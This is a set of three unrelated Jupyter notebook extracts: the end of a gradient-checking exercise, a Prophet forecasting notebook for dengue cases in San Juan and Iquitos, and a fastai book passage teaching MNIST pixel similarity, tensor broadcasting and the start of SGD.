Inputs: "parameters_values, epsilon". Output = "J_plus[i]". # "_" is used because the function you have to outputs two parameters but we only care about the first one ### START CODE HERE ### (approx. 3 lines) thetaplus = np.copy(parameters_values) # Step 1 thetaplus[i][0] = thetaplus[i][0] + epsilon # Step 2 J_plus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(thetaplus)) # Step 3 ### END CODE HERE ### # Compute J_minus[i]. Inputs: "parameters_values, epsilon". Output = "J_minus[i]". ### START CODE HERE ### (approx. 3 lines) thetaminus = np.copy(parameters_values) # Step 1 thetaminus[i][0] = thetaminus[i][0] - epsilon # Step 2 J_minus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(thetaminus)) # Step 3 ### END CODE HERE ### # Compute gradapprox[i] ### START CODE HERE ### (approx. 1 line) gradapprox[i] = (J_plus[i] - J_minus[i])/(2 * epsilon) ### END CODE HERE ### # Compare gradapprox to backward propagation gradients by computing difference. ### START CODE HERE ### (approx. 1 line) numerator = np.linalg.norm(grad - gradapprox) # Step 1' denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox) # Step 2' difference = numerator / denominator # Step 3' ### END CODE HERE ### if difference > 2e-7: print ("\033[93m" + "There is a mistake in the backward propagation! difference = " + str(difference) + "\033[0m") else: print ("\033[92m" + "Your backward propagation works perfectly fine! difference = " + str(difference) + "\033[0m") return difference X, Y, parameters = gradient_check_n_test_case() cost, cache = forward_propagation_n(X, Y, parameters) gradients = backward_propagation_n(X, Y, cache) difference = gradient_check_n(parameters, gradients, X, Y) ``` **Expected output**: <table> <tr> <td> ** There is a mistake in the backward propagation!** </td> <td> difference = 0.285093156781 </td> </tr> </table> It seems that there were errors in the `backward_propagation_n` code we gave you! Good that you've implemented the gradient check. 
Go back to `backward_propagation` and try to find/correct the errors *(Hint: check dW2 and db1)*. Rerun the gradient check when you think you've fixed it. Remember you'll need to re-execute the cell defining `backward_propagation_n()` if you modify the code. Can you get gradient check to declare your derivative computation correct? Even though this part of the assignment isn't graded, we strongly urge you to try to find the bug and re-run gradient check until you're convinced backprop is now correctly implemented. **Note** - Gradient Checking is slow! Approximating the gradient with $\frac{\partial J}{\partial \theta} \approx \frac{J(\theta + \varepsilon) - J(\theta - \varepsilon)}{2 \varepsilon}$ is computationally costly. For this reason, we don't run gradient checking at every iteration during training. Just a few times to check if the gradient is correct. - Gradient Checking, at least as we've presented it, doesn't work with dropout. You would usually run the gradient check algorithm without dropout to make sure your backprop is correct, then add dropout. Congrats, you can be confident that your deep learning model for fraud detection is working correctly! You can even use this to convince your CEO. :) <font color='blue'> **What you should remember from this notebook**: - Gradient checking __verifies closeness__ between the `gradients from backpropagation` and the `numerical approximation of the gradient` (computed using forward propagation). - __Gradient checking is slow__, so we don't run it in _every_ iteration of training. You would usually run it only to make sure your code is correct, then turn it off and use backprop for the actual learning process.
github_jupyter
``` import pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt from os.path import join from sklearn.compose import ColumnTransformer from sklearn.impute import SimpleImputer from sklearn.metrics import mean_absolute_error from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from fbprophet import Prophet from fbprophet.diagnostics import cross_validation sns.set() ``` ## Pre-processing Same as before ``` def data_preprocessing(path): """Load a dengue features CSV and split it into per-city DataFrames. Drops the 'year'/'weekofyear' columns and the 'reanalysis_sat_precip_amt_mm'/'reanalysis_tdtr_k' columns, and renames 'week_start_date' to 'ds' (the date column name Prophet expects). Returns a (features_sj, features_iq) tuple -- San Juan first, then Iquitos -- each with the 'city' column removed.""" features = pd.read_csv(path) features = features.drop(['year', 'weekofyear'], axis = 1) features = features.drop(['reanalysis_sat_precip_amt_mm', 'reanalysis_tdtr_k'], axis = 1) features = features.rename({'week_start_date': 'ds'}, axis = 1) features_sj = features[features['city'] == 'sj'].drop('city', axis = 1) features_iq = features[features['city'] == 'iq'].drop('city', axis = 1) return (features_sj, features_iq) DATA_PATH = '../data/raw' train_sj_o, train_iq = data_preprocessing(join(DATA_PATH, 'dengue_features_train.csv')) test_sj, test_iq = data_preprocessing(join(DATA_PATH, 'dengue_features_test.csv')) train_labels = pd.read_csv(join(DATA_PATH, 'dengue_labels_train.csv')) train_sj_o.head() ``` ## Simple model ### San Juan ``` to_drop = list(train_sj_o.columns[1:]) train_sj = train_sj_o.drop(to_drop, axis = 1) train_sj['y'] = train_labels[train_labels['city'] == 'sj']['total_cases'] model_sj = Prophet( growth = 'linear', changepoint_prior_scale = 0.1, yearly_seasonality = 10, weekly_seasonality = False, daily_seasonality = False, seasonality_mode = 'multiplicative' ) model_sj.fit(train_sj) forecast_sj = model_sj.predict(train_sj) model_sj.plot(forecast_sj) ``` Cross validation ``` cv_sj = cross_validation(model_sj, horizon = '730 days') mean_absolute_error(cv_sj['yhat'], cv_sj['y']) ``` Performs slightly better than previous iteration of prophet ### Iquitos ``` to_drop = list(train_iq.columns[1:]) train_iq = train_iq.drop(to_drop, axis = 1) train_iq['y'] = 
train_labels[train_labels['city'] == 'iq']['total_cases'] model_iq = Prophet( growth = 'linear', yearly_seasonality = 5, weekly_seasonality = False, daily_seasonality = False, seasonality_mode = 'multiplicative' ) model_iq.fit(train_iq) forecast_iq = model_iq.predict(train_iq) model_iq.plot(forecast_iq) ``` Cross validation ``` cv_iq = cross_validation(model_iq, horizon = '730 days') mean_absolute_error(cv_iq['yhat'], cv_iq['y']) ``` Iquitos performs worse with multiplicative seasonality, so we remove it. NOTE: Setting `seasonality_mode` to additive significantly improved the score. We're down to 26 MAE for San Juan. ### Making predictions for Driven Data ``` prophet_basic_sub = pd.read_csv(join(DATA_PATH, 'submission_format.csv')) ``` San Juan ``` to_drop = list(test_sj.columns[1:]) test_sj = test_sj.drop(to_drop, axis = 1) forecast_sj = model_sj.predict(test_sj)['yhat'].values ``` Iquitos ``` test_iq = test_iq.drop(to_drop, axis = 1) forecast_iq = model_iq.predict(test_iq)['yhat'].values y_pred = np.concatenate((forecast_sj, forecast_iq)) prophet_basic_sub['total_cases'] = np.round(y_pred).astype(int) prophet_basic_sub.to_csv('../models/prophet_basic_sub.csv', index = None) ``` ### Results 25.7 MAE on the leaderboard, a significant improvement over the previous submission.
github_jupyter
``` #hide !pip install -Uqq fastbook import fastbook fastbook.setup_book() #hide from fastai.vision.all import * from fastbook import * matplotlib.rc('image', cmap='Greys') ``` # Under the Hood: Training a Digit Classifier Having seen what it looks like to actually train a variety of models in Chapter 2, let’s now look under the hood and see exactly what is going on. We’ll start by using computer vision to introduce fundamental tools and concepts for deep learning. To be exact, we'll discuss the roles of arrays and tensors and of broadcasting, a powerful technique for using them expressively. We'll explain stochastic gradient descent (SGD), the mechanism for learning by updating weights automatically. We'll discuss the choice of a loss function for our basic classification task, and the role of mini-batches. We'll also describe the math that a basic neural network is actually doing. Finally, we'll put all these pieces together. In future chapters we’ll do deep dives into other applications as well, and see how these concepts and tools generalize. But this chapter is about laying foundation stones. To be frank, that also makes this one of the hardest chapters, because of how these concepts all depend on each other. Like an arch, all the stones need to be in place for the structure to stay up. Also like an arch, once that happens, it's a powerful structure that can support other things. But it requires some patience to assemble. Let's begin. The first step is to consider how images are represented in a computer. ## Pixels: The Foundations of Computer Vision In order to understand what happens in a computer vision model, we first have to understand how computers handle images. We'll use one of the most famous datasets in computer vision, [MNIST](https://en.wikipedia.org/wiki/MNIST_database), for our experiments. 
MNIST contains images of handwritten digits, collected by the National Institute of Standards and Technology and collated into a machine learning dataset by Yann Lecun and his colleagues. Lecun used MNIST in 1998 in [Lenet-5](http://yann.lecun.com/exdb/lenet/), the first computer system to demonstrate practically useful recognition of handwritten digit sequences. This was one of the most important breakthroughs in the history of AI. ## Sidebar: Tenacity and Deep Learning The story of deep learning is one of tenacity and grit by a handful of dedicated researchers. After early hopes (and hype!) neural networks went out of favor in the 1990's and 2000's, and just a handful of researchers kept trying to make them work well. Three of them, Yann Lecun, Yoshua Bengio, and Geoffrey Hinton, were awarded the highest honor in computer science, the Turing Award (generally considered the "Nobel Prize of computer science"), in 2018 after triumphing despite the deep skepticism and disinterest of the wider machine learning and statistics community. Geoff Hinton has told of how even academic papers showing dramatically better results than anything previously published would be rejected by top journals and conferences, just because they used a neural network. Yann Lecun's work on convolutional neural networks, which we will study in the next section, showed that these models could read handwritten text—something that had never been achieved before. However, his breakthrough was ignored by most researchers, even as it was used commercially to read 10% of the checks in the US! In addition to these three Turing Award winners, there are many other researchers who have battled to get us to where we are today. 
For instance, Jurgen Schmidhuber (who many believe should have shared in the Turing Award) pioneered many important ideas, including working with his student Sepp Hochreiter on the long short-term memory (LSTM) architecture (widely used for speech recognition and other text modeling tasks, and used in the IMDb example in <<chapter_intro>>). Perhaps most important of all, Paul Werbos in 1974 invented back-propagation for neural networks, the technique shown in this chapter and used universally for training neural networks ([Werbos 1994](https://books.google.com/books/about/The_Roots_of_Backpropagation.html?id=WdR3OOM2gBwC)). His development was almost entirely ignored for decades, but today it is considered the most important foundation of modern AI. There is a lesson here for all of us! On your deep learning journey you will face many obstacles, both technical, and (even more difficult) posed by people around you who don't believe you'll be successful. There's one *guaranteed* way to fail, and that's to stop trying. We've seen that the only consistent trait amongst every fast.ai student that's gone on to be a world-class practitioner is that they are all very tenacious. ## End sidebar For this initial tutorial we are just going to try to create a model that can classify any image as a 3 or a 7. So let's download a sample of MNIST that contains images of just these digits: ``` path = untar_data(URLs.MNIST_SAMPLE) #hide Path.BASE_PATH = path ``` We can see what's in this directory by using `ls`, a method added by fastai. This method returns an object of a special fastai class called `L`, which has all the same functionality of Python's built-in `list`, plus a lot more. 
One of its handy features is that, when printed, it displays the count of items, before listing the items themselves (if there are more than 10 items, it just shows the first few): ``` path.ls() ``` The MNIST dataset follows a common layout for machine learning datasets: separate folders for the training set and the validation set (and/or test set). Let's see what's inside the training set: ``` (path/'train').ls() ``` There's a folder of 3s, and a folder of 7s. In machine learning parlance, we say that "3" and "7" are the *labels* (or targets) in this dataset. Let's take a look in one of these folders (using `sorted` to ensure we all get the same order of files): ``` threes = (path/'train'/'3').ls().sorted() sevens = (path/'train'/'7').ls().sorted() threes ``` As we might expect, it's full of image files. Let’s take a look at one now. Here’s an image of a handwritten number 3, taken from the famous MNIST dataset of handwritten numbers: ``` im3_path = threes[1] im3 = Image.open(im3_path) im3 ``` Here we are using the `Image` class from the *Python Imaging Library* (PIL), which is the most widely used Python package for opening, manipulating, and viewing images. Jupyter knows about PIL images, so it displays the image for us automatically. In a computer, everything is represented as a number. To view the numbers that make up this image, we have to convert it to a *NumPy array* or a *PyTorch tensor*. For instance, here's what a section of the image looks like, converted to a NumPy array: ``` array(im3)[4:10,4:10] ``` The `4:10` indicates we requested the rows from index 4 (included) to 10 (not included) and the same for the columns. NumPy indexes from top to bottom and left to right, so this section is located in the top-left corner of the image. 
Here's the same thing as a PyTorch tensor: ``` tensor(im3)[4:10,4:10] ``` We can slice the array to pick just the part with the top of the digit in it, and then use a Pandas DataFrame to color-code the values using a gradient, which shows us clearly how the image is created from the pixel values: ``` #hide_output im3_t = tensor(im3) df = pd.DataFrame(im3_t[4:15,4:22]) df.style.set_properties(**{'font-size':'6pt'}).background_gradient('Greys') ``` <img width="453" id="output_pd_pixels" src="images/att_00058.png"> You can see that the background white pixels are stored as the number 0, black is the number 255, and shades of gray are between the two. The entire image contains 28 pixels across and 28 pixels down, for a total of 784 pixels. (This is much smaller than an image that you would get from a phone camera, which has millions of pixels, but is a convenient size for our initial learning and experiments. We will build up to bigger, full-color images soon.) So, now you've seen what an image looks like to a computer, let's recall our goal: create a model that can recognize 3s and 7s. How might you go about getting a computer to do that? > Warning: Stop and Think!: Before you read on, take a moment to think about how a computer might be able to recognize these two different digits. What kinds of features might it be able to look at? How might it be able to identify these features? How could it combine them together? Learning works best when you try to solve problems yourself, rather than just reading somebody else's answers; so step away from this book for a few minutes, grab a piece of paper and pen, and jot some ideas down… ## First Try: Pixel Similarity So, here is a first idea: how about we find the average pixel value for every pixel of the 3s, then do the same for the 7s. This will give us two group averages, defining what we might call the "ideal" 3 and 7. 
Then, to classify an image as one digit or the other, we see which of these two ideal digits the image is most similar to. This certainly seems like it should be better than nothing, so it will make a good baseline. > jargon: Baseline: A simple model which you are confident should perform reasonably well. It should be very simple to implement, and very easy to test, so that you can then test each of your improved ideas, and make sure they are always better than your baseline. Without starting with a sensible baseline, it is very difficult to know whether your super-fancy models are actually any good. One good approach to creating a baseline is doing what we have done here: think of a simple, easy-to-implement model. Another good approach is to search around to find other people that have solved similar problems to yours, and download and run their code on your dataset. Ideally, try both of these! Step one for our simple model is to get the average of pixel values for each of our two groups. In the process of doing this, we will learn a lot of neat Python numeric programming tricks! Let's create a tensor containing all of our 3s stacked together. We already know how to create a tensor containing a single image. To create a tensor containing all the images in a directory, we will first use a Python list comprehension to create a plain list of the single image tensors. We will use Jupyter to do some little checks of our work along the way—in this case, making sure that the number of returned items seems reasonable: ``` seven_tensors = [tensor(Image.open(o)) for o in sevens] three_tensors = [tensor(Image.open(o)) for o in threes] len(three_tensors),len(seven_tensors) ``` > note: List Comprehensions: List and dictionary comprehensions are a wonderful feature of Python. Many Python programmers use them every day, including the authors of this book—they are part of "idiomatic Python." But programmers coming from other languages may have never seen them before. 
There are a lot of great tutorials just a web search away, so we won't spend a long time discussing them now. Here is a quick explanation and example to get you started. A list comprehension looks like this: `new_list = [f(o) for o in a_list if o>0]`. This will return every element of `a_list` that is greater than 0, after passing it to the function `f`. There are three parts here: the collection you are iterating over (`a_list`), an optional filter (`if o>0`), and something to do to each element (`f(o)`). It's not only shorter to write but way faster than the alternative ways of creating the same list with a loop. We'll also check that one of the images looks okay. Since we now have tensors (which Jupyter by default will print as values), rather than PIL images (which Jupyter by default will display as images), we need to use fastai's `show_image` function to display it: ``` show_image(three_tensors[1]); ``` For every pixel position, we want to compute the average over all the images of the intensity of that pixel. To do this we first combine all the images in this list into a single three-dimensional tensor. The most common way to describe such a tensor is to call it a *rank-3 tensor*. We often need to stack up individual tensors in a collection into a single tensor. Unsurprisingly, PyTorch comes with a function called `stack` that we can use for this purpose. Some operations in PyTorch, such as taking a mean, require us to *cast* our integer types to float types. Since we'll be needing this later, we'll also cast our stacked tensor to `float` now. Casting in PyTorch is as simple as typing the name of the type you wish to cast to, and treating it as a method. 
Generally when images are floats, the pixel values are expected to be between 0 and 1, so we will also divide by 255 here: ``` stacked_sevens = torch.stack(seven_tensors).float()/255 stacked_threes = torch.stack(three_tensors).float()/255 stacked_threes.shape ``` Perhaps the most important attribute of a tensor is its *shape*. This tells you the length of each axis. In this case, we can see that we have 6,131 images, each of size 28×28 pixels. There is nothing specifically about this tensor that says that the first axis is the number of images, the second is the height, and the third is the width—the semantics of a tensor are entirely up to us, and how we construct it. As far as PyTorch is concerned, it is just a bunch of numbers in memory. The *length* of a tensor's shape is its rank: ``` len(stacked_threes.shape) ``` It is really important for you to commit to memory and practice these bits of tensor jargon: _rank_ is the number of axes or dimensions in a tensor; _shape_ is the size of each axis of a tensor. > A: Watch out because the term "dimension" is sometimes used in two ways. Consider that we live in "three-dimensional space" where a physical position can be described by a 3-vector `v`. But according to PyTorch, the attribute `v.ndim` (which sure looks like the "number of dimensions" of `v`) equals one, not three! Why? Because `v` is a vector, which is a tensor of rank one, meaning that it has only one _axis_ (even if that axis has a length of three). In other words, sometimes dimension is used for the size of an axis ("space is three-dimensional"); other times, it is used for the rank, or the number of axes ("a matrix has two dimensions"). When confused, I find it helpful to translate all statements into terms of rank, axis, and length, which are unambiguous terms. We can also get a tensor's rank directly with `ndim`: ``` stacked_threes.ndim ``` Finally, we can compute what the ideal 3 looks like. 
We calculate the mean of all the image tensors by taking the mean along dimension 0 of our stacked, rank-3 tensor. This is the dimension that indexes over all the images. In other words, for every pixel position, this will compute the average of that pixel over all images. The result will be one value for every pixel position, or a single image. Here it is: ``` mean3 = stacked_threes.mean(0) show_image(mean3); ``` According to this dataset, this is the ideal number 3! (You may not like it, but this is what peak number 3 performance looks like.) You can see how it's very dark where all the images agree it should be dark, but it becomes wispy and blurry where the images disagree. Let's do the same thing for the 7s, but put all the steps together at once to save some time: ``` mean7 = stacked_sevens.mean(0) show_image(mean7); ``` Let's now pick an arbitrary 3 and measure its *distance* from our "ideal digits." > stop: Stop and Think!: How would you calculate how similar a particular image is to each of our ideal digits? Remember to step away from this book and jot down some ideas before you move on! Research shows that recall and understanding improves dramatically when you are engaged with the learning process by solving problems, experimenting, and trying new ideas yourself Here's a sample 3: ``` a_3 = stacked_threes[1] show_image(a_3); ``` How can we determine its distance from our ideal 3? We can't just add up the differences between the pixels of this image and the ideal digit. Some differences will be positive while others will be negative, and these differences will cancel out, resulting in a situation where an image that is too dark in some places and too light in others might be shown as having zero total differences from the ideal. That would be misleading! 
To avoid this, there are two main ways data scientists measure distance in this context: - Take the mean of the *absolute value* of differences (absolute value is the function that replaces negative values with positive values). This is called the *mean absolute difference* or *L1 norm* - Take the mean of the *square* of differences (which makes everything positive) and then take the *square root* (which undoes the squaring). This is called the *root mean squared error* (RMSE) or *L2 norm*. > important: It's Okay to Have Forgotten Your Math: In this book we generally assume that you have completed high school math, and remember at least some of it... But everybody forgets some things! It all depends on what you happen to have had reason to practice in the meantime. Perhaps you have forgotten what a _square root_ is, or exactly how they work. No problem! Any time you come across a maths concept that is not explained fully in this book, don't just keep moving on; instead, stop and look it up. Make sure you understand the basic idea, how it works, and why we might be using it. One of the best places to refresh your understanding is Khan Academy. For instance, Khan Academy has a great [introduction to square roots](https://www.khanacademy.org/math/algebra/x2f8bb11595b61c86:rational-exponents-radicals/x2f8bb11595b61c86:radicals/v/understanding-square-roots). Let's try both of these now: ``` dist_3_abs = (a_3 - mean3).abs().mean() dist_3_sqr = ((a_3 - mean3)**2).mean().sqrt() dist_3_abs,dist_3_sqr dist_7_abs = (a_3 - mean7).abs().mean() dist_7_sqr = ((a_3 - mean7)**2).mean().sqrt() dist_7_abs,dist_7_sqr ``` In both cases, the distance between our 3 and the "ideal" 3 is less than the distance to the ideal 7. So our simple model will give the right prediction in this case. PyTorch already provides both of these as *loss functions*. 
You'll find these inside `torch.nn.functional`, which the PyTorch team recommends importing as `F` (and is available by default under that name in fastai): ``` F.l1_loss(a_3.float(),mean7), F.mse_loss(a_3,mean7).sqrt() ``` Here `mse` stands for *mean squared error*, and `l1` refers to the standard mathematical jargon for *mean absolute value* (in math it's called the *L1 norm*). > S: Intuitively, the difference between L1 norm and mean squared error (MSE) is that the latter will penalize bigger mistakes more heavily than the former (and be more lenient with small mistakes). > J: When I first came across this "L1" thingie, I looked it up to see what on earth it meant. I found on Google that it is a _vector norm_ using _absolute value_, so looked up _vector norm_ and started reading: _Given a vector space V over a field F of the real or complex numbers, a norm on V is a nonnegative-valued any function p: V → \[0,+∞) with the following properties: For all a ∈ F and all u, v ∈ V, p(u + v) ≤ p(u) + p(v)..._ Then I stopped reading. "Ugh, I'll never understand math!" I thought, for the thousandth time. Since then I've learned that every time these complex mathy bits of jargon come up in practice, it turns out I can replace them with a tiny bit of code! Like, the _L1 loss_ is just equal to `(a-b).abs().mean()`, where `a` and `b` are tensors. I guess mathy folks just think differently than me... I'll make sure in this book that every time some mathy jargon comes up, I'll give you the little bit of code it's equal to as well, and explain in common-sense terms what's going on. We just completed various mathematical operations on PyTorch tensors. If you've done some numeric programming in PyTorch before, you may recognize these as being similar to NumPy arrays. Let's have a look at those two very important data structures. ### NumPy Arrays and PyTorch Tensors [NumPy](https://numpy.org/) is the most widely used library for scientific and numeric programming in Python. 
It provides very similar functionality and a very similar API to that provided by PyTorch; however, it does not support using the GPU or calculating gradients, which are both critical for deep learning. Therefore, in this book we will generally use PyTorch tensors instead of NumPy arrays, where possible. (Note that fastai adds some features to NumPy and PyTorch to make them a bit more similar to each other. If any code in this book doesn't work on your computer, it's possible that you forgot to include a line like this at the start of your notebook: `from fastai.vision.all import *`.) But what are arrays and tensors, and why should you care? Python is slow compared to many languages. Anything fast in Python, NumPy, or PyTorch is likely to be a wrapper for a compiled object written (and optimized) in another language—specifically C. In fact, **NumPy arrays and PyTorch tensors can finish computations many thousands of times faster than using pure Python.** A NumPy array is a multidimensional table of data, with all items of the same type. Since that can be any type at all, they can even be arrays of arrays, with the innermost arrays potentially being different sizes—this is called a "jagged array." By "multidimensional table" we mean, for instance, a list (dimension of one), a table or matrix (dimension of two), a "table of tables" or "cube" (dimension of three), and so forth. If the items are all of some simple type such as integer or float, then NumPy will store them as a compact C data structure in memory. This is where NumPy shines. NumPy has a wide variety of operators and methods that can run computations on these compact structures at the same speed as optimized C, because they are written in optimized C. A PyTorch tensor is nearly the same thing as a NumPy array, but with an additional restriction that unlocks some additional capabilities. It's the same in that it, too, is a multidimensional table of data, with all items of the same type. 
However, the restriction is that a tensor cannot use just any old type—it has to use a single basic numeric type for all components. For example, a PyTorch tensor cannot be jagged. It is always a regularly shaped multidimensional rectangular structure. The vast majority of methods and operators supported by NumPy on these structures are also supported by PyTorch, but PyTorch tensors have additional capabilities. One major capability is that these structures can live on the GPU, in which case their computation will be optimized for the GPU and can run much faster (given lots of values to work on). In addition, PyTorch can automatically calculate derivatives of these operations, including combinations of operations. As you'll see, it would be impossible to do deep learning in practice without this capability. > S: If you don't know what C is, don't worry as you won't need it at all. In a nutshell, it's a low-level (low-level means more similar to the language that computers use internally) language that is very fast compared to Python. To take advantage of its speed while programming in Python, try to avoid as much as possible writing loops, and replace them by commands that work directly on arrays or tensors. Perhaps the most important new coding skill for a Python programmer to learn is how to effectively use the array/tensor APIs. We will be showing lots more tricks later in this book, but here's a summary of the key things you need to know for now. To create an array or tensor, pass a list (or list of lists, or list of lists of lists, etc.) to `array()` or `tensor()`: ``` data = [[1,2,3],[4,5,6]] arr = array (data) tns = tensor(data) arr # numpy tns # pytorch ``` All the operations that follow are shown on tensors, but the syntax and results for NumPy arrays is identical. 
You can select a row (note that, like lists in Python, tensors are 0-indexed so 1 refers to the second row/column): ``` tns[1] ``` or a column, by using `:` to indicate *all of the first axis* (we sometimes refer to the dimensions of tensors/arrays as *axes*): ``` tns[:,1] ``` You can combine these with Python slice syntax (`[start:end]` with `end` being excluded) to select part of a row or column: ``` tns[1,1:3] ``` And you can use the standard operators such as `+`, `-`, `*`, `/`: ``` tns+1 ``` Tensors have a type: ``` tns.type() ``` And will automatically change type as needed, for example from `int` to `float`: ``` tns*1.5 ``` So, is our baseline model any good? To quantify this, we must define a metric. ## Computing Metrics Using Broadcasting Recall that a metric is a number that is calculated based on the predictions of our model, and the correct labels in our dataset, in order to tell us how good our model is. For instance, we could use either of the functions we saw in the previous section, mean squared error, or mean absolute error, and take the average of them over the whole dataset. However, neither of these are numbers that are very understandable to most people; in practice, we normally use *accuracy* as the metric for classification models. As we've discussed, we want to calculate our metric over a *validation set*. This is so that we don't inadvertently overfit—that is, train a model to work well only on our training data. This is not really a risk with the pixel similarity model we're using here as a first try, since it has no trained components, but we'll use a validation set anyway to follow normal practices and to be ready for our second try later. To get a validation set we need to remove some of the data from training entirely, so it is not seen by the model at all. As it turns out, the creators of the MNIST dataset have already done this for us. Do you remember how there was a whole separate directory called *valid*? 
That's what this directory is for! So to start with, let's create tensors for our 3s and 7s from that directory. These are the tensors we will use to calculate a metric measuring the quality of our first-try model, which measures distance from an ideal image: ``` valid_3_tens = torch.stack([tensor(Image.open(o)) for o in (path/'valid'/'3').ls()]) valid_3_tens = valid_3_tens.float()/255 valid_7_tens = torch.stack([tensor(Image.open(o)) for o in (path/'valid'/'7').ls()]) valid_7_tens = valid_7_tens.float()/255 valid_3_tens.shape,valid_7_tens.shape ``` It's good to get in the habit of checking shapes as you go. Here we see two tensors, one representing the 3s validation set of 1,010 images of size 28×28, and one representing the 7s validation set of 1,028 images of size 28×28. We ultimately want to write a function, `is_3`, that will decide if an arbitrary image is a 3 or a 7. It will do this by deciding which of our two "ideal digits" this arbitrary image is closer to. For that we need to define a notion of distance—that is, a function that calculates the distance between two images. We can write a simple function that calculates the mean absolute error using an expression very similar to the one we wrote in the last section: ``` def mnist_distance(a,b): return (a-b).abs().mean((-1,-2)) mnist_distance(a_3, mean3) ``` This is the same value we previously calculated for the distance between these two images, the ideal 3 `mean3` and the arbitrary sample 3 `a_3`, which are both single-image tensors with a shape of `[28,28]`. But in order to calculate a metric for overall accuracy, we will need to calculate the distance to the ideal 3 for _every_ image in the validation set. How do we do that calculation? We could write a loop over all of the single-image tensors that are stacked within our validation set tensor, `valid_3_tens`, which has a shape of `[1010,28,28]` representing 1,010 images. But there is a better way. 
Something very interesting happens when we take this exact same distance function, designed for comparing two single images, but pass in as an argument `valid_3_tens`, the tensor that represents the 3s validation set: ``` valid_3_dist = mnist_distance(valid_3_tens, mean3) valid_3_dist, valid_3_dist.shape ``` Instead of complaining about shapes not matching, it returned the distance for every single image as a vector (i.e., a rank-1 tensor) of length 1,010 (the number of 3s in our validation set). How did that happen? Take another look at our function `mnist_distance`, and you'll see we have there the subtraction `(a-b)`. The magic trick is that PyTorch, when it tries to perform a simple subtraction operation between two tensors of different ranks, will use *broadcasting*. That is, it will automatically expand the tensor with the smaller rank to have the same size as the one with the larger rank. Broadcasting is an important capability that makes tensor code much easier to write. After broadcasting so the two argument tensors have the same rank, PyTorch applies its usual logic for two tensors of the same rank: it performs the operation on each corresponding element of the two tensors, and returns the tensor result. For instance: ``` tensor([1,2,3]) + tensor([1,1,1]) ``` So in this case, PyTorch treats `mean3`, a rank-2 tensor representing a single image, as if it were 1,010 copies of the same image, and then subtracts each of those copies from each 3 in our validation set. What shape would you expect this tensor to have? Try to figure it out yourself before you look at the answer below: ``` (valid_3_tens-mean3).shape ``` We are calculating the difference between our "ideal 3" and each of the 1,010 3s in the validation set, for each of 28×28 images, resulting in the shape `[1010,28,28]`. 
There are a couple of important points about how broadcasting is implemented, which make it valuable not just for expressivity but also for performance: - PyTorch doesn't *actually* copy `mean3` 1,010 times. It *pretends* it were a tensor of that shape, but doesn't actually allocate any additional memory - It does the whole calculation in C (or, if you're using a GPU, in CUDA, the equivalent of C on the GPU), tens of thousands of times faster than pure Python (up to millions of times faster on a GPU!). This is true of all broadcasting and elementwise operations and functions done in PyTorch. *It's the most important technique for you to know to create efficient PyTorch code.* Next in `mnist_distance` we see `abs`. You might be able to guess now what this does when applied to a tensor. It applies the method to each individual element in the tensor, and returns a tensor of the results (that is, it applies the method "elementwise"). So in this case, we'll get back 1,010 matrices of absolute values. Finally, our function calls `mean((-1,-2))`. The tuple `(-1,-2)` represents a range of axes. In Python, `-1` refers to the last element, and `-2` refers to the second-to-last. So in this case, this tells PyTorch that we want to take the mean ranging over the values indexed by the last two axes of the tensor. The last two axes are the horizontal and vertical dimensions of an image. After taking the mean over the last two axes, we are left with just the first tensor axis, which indexes over our images, which is why our final size was `(1010)`. In other words, for every image, we averaged the intensity of all the pixels in that image. We'll be learning lots more about broadcasting throughout this book, especially in <<chapter_foundations>>, and will be practicing it regularly too. 
We can use `mnist_distance` to figure out whether an image is a 3 or not by using the following logic: if the distance between the digit in question and the ideal 3 is less than the distance to the ideal 7, then it's a 3. This function will automatically do broadcasting and be applied elementwise, just like all PyTorch functions and operators: ``` def is_3(x): return mnist_distance(x,mean3) < mnist_distance(x,mean7) ``` Let's test it on our example case: ``` is_3(a_3), is_3(a_3).float() ``` Note that when we convert the Boolean response to a float, we get `1.0` for `True` and `0.0` for `False`. Thanks to broadcasting, we can also test it on the full validation set of 3s: ``` is_3(valid_3_tens) ``` Now we can calculate the accuracy for each of the 3s and 7s by taking the average of that function for all 3s and its inverse for all 7s: ``` accuracy_3s = is_3(valid_3_tens).float() .mean() accuracy_7s = (1 - is_3(valid_7_tens).float()).mean() accuracy_3s,accuracy_7s,(accuracy_3s+accuracy_7s)/2 ``` This looks like a pretty good start! We're getting over 90% accuracy on both 3s and 7s, and we've seen how to define a metric conveniently using broadcasting. But let's be honest: 3s and 7s are very different-looking digits. And we're only classifying 2 out of the 10 possible digits so far. So we're going to need to do better! To do better, perhaps it is time to try a system that does some real learning—that is, that can automatically modify itself to improve its performance. In other words, it's time to talk about the training process, and SGD. ## Stochastic Gradient Descent (SGD) Do you remember the way that Arthur Samuel described machine learning, which we quoted in <<chapter_intro>>? > : Suppose we arrange for some automatic means of testing the effectiveness of any current weight assignment in terms of actual performance and provide a mechanism for altering the weight assignment so as to maximize the performance. 
We need not go into the details of such a procedure to see that it could be made entirely automatic and to see that a machine so programmed would "learn" from its experience. As we discussed, this is the key to allowing us to have a model that can get better and better—that can learn. But our pixel similarity approach does not really do this. We do not have any kind of weight assignment, or any way of improving based on testing the effectiveness of a weight assignment. In other words, we can't really improve our pixel similarity approach by modifying a set of parameters. In order to take advantage of the power of deep learning, we will first have to represent our task in the way that Arthur Samuel described it. Instead of trying to find the similarity between an image and an "ideal image," we could instead look at each individual pixel and come up with a set of weights for each one, such that the highest weights are associated with those pixels most likely to be black for a particular category. For instance, pixels toward the bottom right are not very likely to be activated for a 7, so they should have a low weight for a 7, but they are likely to be activated for an 8, so they should have a high weight for an 8. This can be represented as a function and set of weight values for each possible category—for instance the probability of being the number 8: ``` def pr_eight(x,w): return (x*w).sum() ``` Here we are assuming that `x` is the image, represented as a vector—in other words, with all of the rows stacked up end to end into a single long line. And we are assuming that the weights are a vector `w`. If we have this function, then we just need some way to update the weights to make them a little bit better. With such an approach, we can repeat that step a number of times, making the weights better and better, until they are as good as we can make them. 
